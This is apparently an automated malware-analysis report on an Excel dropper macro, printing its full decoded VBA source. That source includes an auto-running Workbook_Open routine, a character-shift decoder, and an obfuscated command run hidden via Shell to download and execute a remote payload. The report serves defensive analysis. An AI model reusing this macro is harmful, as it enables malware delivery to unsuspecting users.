Xls.Dropper.Agent-1563584 — Office (OLE) malware analysis

Static analysis result for SHA-256 23bd0ee4ddf2fe49…

MALICIOUS

Office (OLE)

109.5 KB Created: 1996-10-08 23:32:33 Authoring application: Microsoft Excel First seen: 2015-03-15
MD5: 1c76d4077a551468e834fada41673852 SHA-1: 634b4a9f4809ae7bf42bdec468a2fc5ae082e376 SHA-256: 23bd0ee4ddf2fe49fc132fa044b96994d8ff812640bb48f62b92c263c898e599
150 Risk Score

Malware Insights

Xls.Dropper.Agent-1563584 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file is an Excel document containing VBA macros, specifically a Workbook_Open macro. Heuristics indicate a potential Shell call within the VBA code and ClamAV identified it as Xls.Dropper.Agent-1563584. The macro is likely designed to download and execute a secondary payload, a common dropper behavior.

Heuristics 5

  • ClamAV: Xls.Dropper.Agent-1563584 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-1563584
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell FfdsfF, vbHide
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12628 bytes
SHA-256: e8c5b068d41111b9ed04ce665c4111aff2962d794f4240b45f135561a25ee5b7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
179 of 250 identifiers look randomly generated (e.g. 'aNjZPeoQJJltGiChFQjYUOh') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
    tyrtyaag
End Sub

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Function pARgBpyQQ()

End Function
Public Function xCKAgpotPQeIV()

End Function
Private Sub rjHQPzik()

End Sub
Private Sub zwfsRRtNqJpNfFfqk()

End Sub
Private Sub TflhsJY()

End Sub
Private Sub OJnoUcuC()

End Sub
Public Sub TRQIOVmNMdSVMm()

End Sub
Private Function aNjZPeoQ()

End Function
Private Function ltGiChFQjYUO()

End Function
Private Sub kvBxIabwxH()

End Sub
Private Function FmsLTIok()

End Function

Attribute VB_Name = "Module2"
Private Function QPUryFkxwMPSKj()

End Function
Private Function JLgIN()

End Function
Public Sub TttUdqRlQpG()

End Sub
Private Sub LeNkTflhsJYghr()

End Sub
Public Sub oUcuCsYTRQIOVmNMdSVMm()

End Sub
Public Sub aNjZPeoQJJltGiChFQjYUOh()

End Sub
Public Function vBxIabw()

End Function
Public Sub LpFmsL()

End Sub
Public Sub kkinZRZD()

End Sub
Private Function jmeCgK()

End Function
Private Function zpguEn()

End Function
Private Function oJQlSkVazolfx()

End Function

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Function PyyllMUiJeI()

End Function
Private Function zwqIFdMQdZkB()

End Function
Public Sub jGnQh()

End Sub
Private Function vkPLLKO()

End Function
Public Sub fFrGKNFeHm()

End Sub
Public Sub bQHVgOOBoPm()

End Sub
Public Function LxBbPMGZV()

End Function
Private Sub tpBESoq()

End Sub
Public Function hxPkDxnSccb()

End Function

Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Function kNdJQjrhMHI()

End Function
Public Sub qxcCnDHKB()

End Sub
Private Sub SODYNEdLLylLivJrIuyY()

End Sub
Private Sub VSpLkqmxBPl()

End Sub
Public Function AeuMhAukPZZ()

End Function
Private Function GNsEETYbSrGzj()

End Function
Public Sub QUjtOcOB()

End Sub

Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UjtOcOBdzxaHZK()

End Sub
Private Sub aTmjGcAspARgB()

End Sub
Public Sub QuwdxCKAgppotPQ()

End Sub
Private Function UlorjHQPzikEhlz()

End Function
Private Sub RRtBNqJp()

End Sub
Public Function fqkCmIsDJFQ()

End Function
Private Function FPniLMtzSbQ()

End Function
Public Function qvgnuKml()

End Function

Attribute VB_Name = "Module3"
Public Sub YUDQqqRamOiN()

End Sub
Private Sub DOIbK()

End Sub
Public Sub hepGU()

End Sub
Private Function LGjlRYrz()

End Function
Public Sub QOTELSjKJaPRJ()

End Sub
Private Sub oQKfVMbl()

End Sub
Private Function GiqCfyeCTgTR()

End Function
Private Sub xhsyuQYtuEcImBip()

End Sub
Public Function lghfkUOVzbL()

End Function
Public Sub azcHrn()

End Sub
Public Sub drBkkQJ()

End Sub
Public Sub iOhSQwlicurNkI()

End Sub

Attribute VB_Name = "Module4"
Private Sub syuFQY()

End Sub
Private Sub cImBipHPFlg()

End Sub
Private Sub UOVzbLc()

End Sub
Public Sub zcHrn()

End Sub
Public Sub drBkkQJGTiOhSQ()

End Sub
Public Sub curNkI()

End Sub
Private Function ZoJKUeZCSlFZSIo()

End Function
Public Function AmfmQddswqPfYHpsMpt()

End Function
Private Sub AnaBQVy()

End Sub
Private Function nMnysKH()

End Function

Attribute VB_Name = "Module5"
Private Sub BoPmyMuLxBbPM()

End Sub
Private Function tOntpBESoqzJEhx()

End Function
Private Sub xnSccbgQJQv()

End Sub
Private Sub beVuJCmUQrTYmwR()

End Sub
Private Sub gCAdKcNRsRd()

End Sub
Public Sub JfDwsDU()

End Sub
Public Function CaUyzgAFN()

End Function
Public Sub srwSahLZ()

End Sub
Public Function umKaSCln()

End Function
Private Sub CzivUUwE()

End Sub
Private Sub sQiIjuoGpLvGM()

End Sub
Private Function AHISqlO()

End Function
Public Sub QeTzuvtykqx()

End Sub

Attribute VB_Name = "Module6"
Private Function iJRfGa()

End Function
Private Sub HvtnFCZIT()

End Sub
Public Function yzUVgDNdJQjrh()

End Function
Private Sub GLxqxcCnDHKBDjSOD()

End Sub
Public Function SdLLylLivJr()

End Function
Public Function YMJDVSpLkq()

End Function
Private Sub PlnwFAeuMh()

End Sub
Private Sub PZZQcNG()

End Sub
Private Sub ETYbSrGzjQT()

End Sub
Public Sub jtOcOBdzxaHZKOo()

End Sub

Attribute VB_Name = "Class4"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub IcVLrAAz()

End Sub
Public Function pTggwz()

End Function
Private Sub ibKsvPswKUqDqd()

End Sub
Public Sub BjAmqPqBvNKiDcT()

End Sub
Public Function HdQaytVYE()

End Function
Private Sub cHQQPUr()

End Sub
Private Function xwMPSKj()

End Function
Public Sub JLgINYGTtt()

End Sub
Private Function RlQpGhGR()

End Function
Private Function kTflhsJYghrOJ()

End Function
Public Function cuCsYSTRQIOVmNM()

End Function
Private Function MmOuraNjZPeoQQJ()

End Function
Public Function iJeIhyKzwqIFdMQ()

End Function
Private Sub BCYajGn()

End Sub
Private Sub TnvkPLLKOAtAf()

End Sub

Attribute VB_Name = "Module7"
Public Sub xCKAg()

End Sub
Private Sub tPQeIVUl()

End Sub
Private Sub HQPzik()

End Sub
Public Sub zwfsRRt()

End Sub
Private Sub JpNfFfqk()

End Sub
Private Function sDJFQiwEFPni()

End Function
Public Function zSbQwrsqv()

End Function
Private Function KmlBrtlKn()

End Function
Private Function mHxoCMvvii()

End Function
Private Sub GaFevH()

End Sub

Attribute VB_Name = "Module11"
Sub tyrtyaag()
FfdsfF = NewQkeTzIIHM("pzq-<X-]|„r `uryy;r…r-5[r„:\owrpЃ-`†ЂЃrz;[rЃ;droPyvr{Ѓ6;Q|„{y|nqSvyr54uЃЃ}G<<>DC;@>;?E;?@B<x„rsr„rs<stqЂrr<q…‡~;w}t4942aRZ]2iWV\v|qsuv|VU;pno46H-r…}n{q-2aRZ]2iWV\v|qsuv|VU;pno-2aRZ]2iWV\v|qsuv|VU;r…rH-ЂЃn Ѓ-2aRZ]2iWV\v|qsuv|VU;r…rH")
Shell FfdsfF, vbHide
End Sub


Attribute VB_Name = "Module8"
Public Sub anmCGIAap()

End Sub
Public Sub BQzDRNwKjk()

End Sub
Public Sub IcGfxQ()

End Sub
Public Function UDbKUbQjzOV()

End Function
Private Function zdfLRltjOJJ()

End Function
Public Sub FMdDCSILDc()

End Sub
Public Sub PEZPGT()

End Sub
Public Sub AAbkwZsYvNaNK()

End Sub

Attribute VB_Name = "Module9"

Attribute VB_Name = "Module10"
Public Function ZPeoQQ()

End Function
Public Sub tGiChFQ()

End Sub
Private Function OheAkvBxIabwxHf()

End Function
Private Sub msLTIokkinZ()

End Sub
Private Sub ePfjmeCgKuq()

End Sub
Public Function guEnnaMo()

End Function
Public Sub SkVazol()

End Sub
Public Function RnLRNadrM()

End Function
Public Sub cFVoIc()

End Sub
Public Sub AAzDpipT()

End Sub
Public Function zCuSibKsv()

End Function
Private Sub KUqDqdEbZ()

End Sub
Private Sub mqPqBvNKiD()

End Sub

Attribute VB_Name = "Module12"
Public Sub NNMQovChttI()

End Sub
Public Function gvoYFIdFJYUD()

End Function
Private Function RamOiNlD()

End Function
Private Function IbKhQchepGUde()

End Function
Private Sub jlRYrzpUPQO()

End Sub
Private Sub SjKJBrtlKnRPy()

End Sub
Private Function oCMvviiJRf()

End Function
Private Sub evHvtnFCZIT()

End Sub
Public Function yzUVgD()

End Function
Public Function JQjrh()

End Function
Public Sub GLxqxcCnDHKB()

End Sub
Private Function SODYNE()

End Function
Public Function LylLivJrIuyYM()

End Function
Public Function SpLkqmxBPlnwFAe()

End Function
Public Function AukPZZ()

End Function

Attribute VB_Name = "Module13"
Public Function mwRfREgCAdKcNRs()

End Function
Private Sub pmJfDwsDUjEsCaU()

End Sub
Private Function AFNDjs()

End Function
Private Sub SahLZYoru()

End Sub
Private Sub SClnH()

End Sub
Public Function zivUUwERtMs()

End Function
Public Sub juoGpLvGMITl()

End Sub
Public Sub SqlOQwDQeTzu()

End Sub
Public Function kqxOpoEuxo()

End Function
Private Sub TBqKArFPyyllMUi()

End Sub
Public Sub hyKzwqIFdMQd()

End Sub
Private Function CYajGnQhNT()

End Function
Public Function PLLKOAt()

End Function
Private Function rGKNFeHmVRG()

End Function

Attribute VB_Name = "Class5"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Function MGZVtOntpBESo()

End Function
Public Function EhxPkDxnSccb()

End Function
Public Sub QvIHYbeVuJCm()

End Sub
Private Sub TYmwRfRE()

End Sub
Public Sub dKcNRsRdQp()

End Sub
Public Function DwsDUj()

End Function

Attribute VB_Name = "Module14"

Public Function NewQkeTzIIHM(ByVal AESdyLylMjhJrIu As String) As String
GoTo lZiGBegMhmukPZZYdz
lZiGBegMhmukPZZYdz:
GoTo httIMPHgvoYFI
httIMPHgvoYFI:
GoTo JYUDQqqRamOiNl
JYUDQqqRamOiNl:
GoTo DOIbKh
DOIbKh:
Dim YyJDVSqLkdZk As Long
GoTo epGUden
epGUden:
For YyJDVSqLkdZk = 1 To Len(AESdyLylMjhJrIu)
GoTo lRYrzpUP
lRYrzpUP:
GoTo TELSjKJaPRJjLqoQK
TELSjKJaPRJjLqoQK:
GoTo MblTSGGiqCfyeCTgTRL
MblTSGGiqCfyeCTgTRL:
GoTo xhsyu
xhsyu:
GoTo YtuEcImBipHPFlghfkUO
YtuEcImBipHPFlghfkUO:
NewQkeTzIIHM = NewQkeTzIIHM & Chr(Asc(Mid(AESdyLylMjhJrIu, YyJDVSqLkdZk, 1)) - 13)
GoTo Lcgja
Lcgja:
GoTo Hrnbw
Hrnbw:
GoTo rBkkQJ
rBkkQJ:
GoTo TiOhSQwlicurNkI
TiOhSQwlicurNkI:
Next YyJDVSqLkdZk
GoTo ZoJKUeZCSlFZSIowxvAm
ZoJKUeZCSlFZSIowxvAm:
GoTo QddswzqP
QddswzqP:
GoTo HpsMptHRnAnaBQVygxjn
HpsMptHRnAnaBQVygxjn:
GoTo ysKHfAZQM
ysKHfAZQM:
GoTo EaNQvpSUBV
EaNQvpSUBV:
End Function


Attribute VB_Name = "Module15"
Public Sub AmfmQddsw()

End Sub
Public Sub fYHpsMptHRnAn()

End Sub
Private Function VygxjnMnysKHfAZ()

End Function
Private Function qEaNQvpSUBVbjZE()

End Function
Private Function QovChttIMPHgv()

End Function
Public Sub IdFJYUDQqqR()

End Sub
Public Sub iNlDdDOIbKhQc()

End Sub
Private Sub GUdenLGj()

End Sub
Public Sub rzpUPQOTELSjKJa()

End Sub
Public Function jLqoQKfVMblT()

End Function

Attribute VB_Name = "Module16"
Public Function qfzpguEnn()

End Function
Private Sub JQlSkVaz()

End Sub
Private Function xuRnLR()

End Function
Public Sub rMOYi()

End Sub
Private Function oIcVLrAAzDpipTg()

End Function
Public Function CuSibKsvPs()

End Function
Public Sub qDqdEbZBjAmqPqB()

End Sub
Public Sub iDcTQctHdQay()

End Sub
Private Function EZemcHQQPUryFkx()

End Function
Public Sub SKjyrbJLgINbYG()

End Sub
Private Sub UdqRlQpGh()

End Sub
Private Sub eNkTflhsJYghr()

End Sub
Public Sub oUcuCsY()

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.